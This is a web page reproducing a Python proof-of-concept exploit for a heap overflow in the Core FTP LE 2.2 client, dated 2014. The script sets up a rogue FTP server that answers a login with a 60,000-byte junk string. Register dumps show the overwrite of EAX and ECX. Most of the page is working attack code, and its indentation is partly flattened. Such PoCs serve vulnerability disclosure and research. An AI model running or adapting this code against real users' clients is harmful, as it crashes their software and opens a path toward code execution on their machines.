facebook facebook twitter rss

Core FTP LE 2.2 (build 1823), updated Nov 25th, 2014 Heap Overflow PoC

Author: Hadji Samir , Published: 14-12-2014
#!/usr/bin/python

# Exploit Title: Core FTP LE 2.2 (build 1823), updated Nov 25th, 2014 Heap Overflow PoC
# Date: 14/12/2014
# Author: Hadji Samir
# Software Link: http://www.coreftp.com/download.html
# Vulnerable version: 2.2 (build 1823), updated Nov 25th, 2014
# Tested on: Windows 7 FR
# CVE :

#EAX 02C3EE70 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#ECX 41414141
#EDX 02C5B220



from socket import *
import struct
import time



junk = "\x41" * 60000


host = "0.0.0.0"
port = 21

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)

print "\n[+] Core FTP LE 2.2 (build 1823), updated Nov 25th, 2014 Buffer Overflow POC"
print "[+] Hadji Samir s-dz@hotmail.fr"
print "============================================="
print "[+] wizz Server Started."
print "[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
print "[+] Whatever for username and password."

def Samir():
welcome = "220 Welcome to wizz Server\r\n"
cl.send(welcome)
cl.recv(1024)
cl.send("331 User name ok, need password\r\n") # received USER
cl.recv(1024)
cl.send("230-Password accepted("+junk+")\r\n") # received PASS

Samir()
time.sleep(3)
print "[+] wizzzzzzzzzzz..\r\n"

s.close()

Like us on Facebook :